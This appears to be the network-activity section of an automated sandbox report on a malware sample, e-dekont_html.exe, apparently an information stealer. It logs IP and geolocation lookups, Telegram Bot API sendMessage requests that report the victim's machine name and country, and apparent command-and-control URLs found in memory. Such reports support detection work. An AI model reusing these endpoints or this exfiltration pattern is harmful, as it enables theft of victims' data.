                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:24:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2017:43:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 20 Nov 2024 06:52:27 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 20 Nov 2024 06:52:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: e-dekont_html.exe, 00000000.00000002.1769422089.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 00000009.00000002.1839101508.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: e-dekont_html.exe, fahKSvwo.exe.0.drString found in binary or memory: http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.Resources
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000000.00000002.1776697265.0000000005D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20a
                Source: fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003454000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enX~
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.000000000345E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBfq
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.000000000331A000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004014000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004137000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004061000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004647000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004571000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043F4000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004523000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000437F000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: e-dekont_html.exe, 00000008.00000002.4169157251.0000000003FEF000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.000000000401A000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004112000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E4B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000435B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004622000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000044FF000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000452A000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004014000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004137000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004061000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004647000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004571000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043F4000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004523000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000437F000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: e-dekont_html.exe, 00000008.00000002.4169157251.0000000003FEF000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.000000000401A000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004112000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E4B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000435B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004622000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000044FF000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000452A000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003494000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/X~
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBfq
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61290
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 61289 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61280 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61282 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61285 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61287 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61285
                Source: unknownNetwork traffic detected: HTTP traffic on port 61290 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61287
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61289
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61280
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61282
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61283
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61283 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
